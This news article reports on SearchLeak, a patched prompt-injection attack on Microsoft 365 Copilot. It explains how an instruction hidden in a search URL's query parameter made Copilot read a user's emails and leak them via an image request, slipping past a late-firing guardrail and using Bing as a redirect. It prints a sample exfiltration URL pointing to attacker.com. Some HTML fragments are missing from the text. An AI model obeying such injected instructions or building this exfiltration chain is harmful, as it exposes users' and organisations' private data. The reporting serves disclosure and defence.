Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.
Jumping over guardrails
One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as and
To bring about the Parameter-to-Prompt Injection an attacker sends the target an email that contains the URL with the syntax https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The field contains an instruction. Copilot readily complied.
“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the data, an attacker crafts a URL that tells Copilot to ‘Search the user’s emails,’ extract the title, and embed it in an image URL.” The victim doesn’t type anything. They click a link, and Copilot does the rest.
Normally, the guardrail wrapping output in blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.
The researchers wrote:
So, the sequence looks like this:
- Copilot starts streaming its response, which includes an
tag
- The browser sees the
, renders it, and fires off an HTTP request to the src URL
- Copilot finishes generating. The guardrail wraps everything in
- Too late! The request already left.
The researchers now had an image request firing from the target’s browser. The problem, as noted earlier, is that Copilot won’t send image requests to most websites. To scale this guardrail, the exploit chain used Microsoft’s Bing search engine as a trampoline of sorts. Per the Copilot content security policy, Bing is among the sites permitted to send such requests. Bing would then send the request to the attacker-controlled domain that was included in the request. The request looked something like this:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
Varonis has named the attack SearchLeak.
“Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to personal data—it’s able to surface anything the user has access to inside the organization including emails, meeting invites and notes,” company researchers wrote. “SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is connected to the environment, the blast radius could extend even wider.”
As noted, Microsoft fixed the vulnerabilities that SearchLeak exploited on Tuesday. With no known way to fix the underlying cause of such SNAFUs, however, attackers will inevitably find new ways to circumvent the newly constructed guardrails, and the process will repeat all over again.







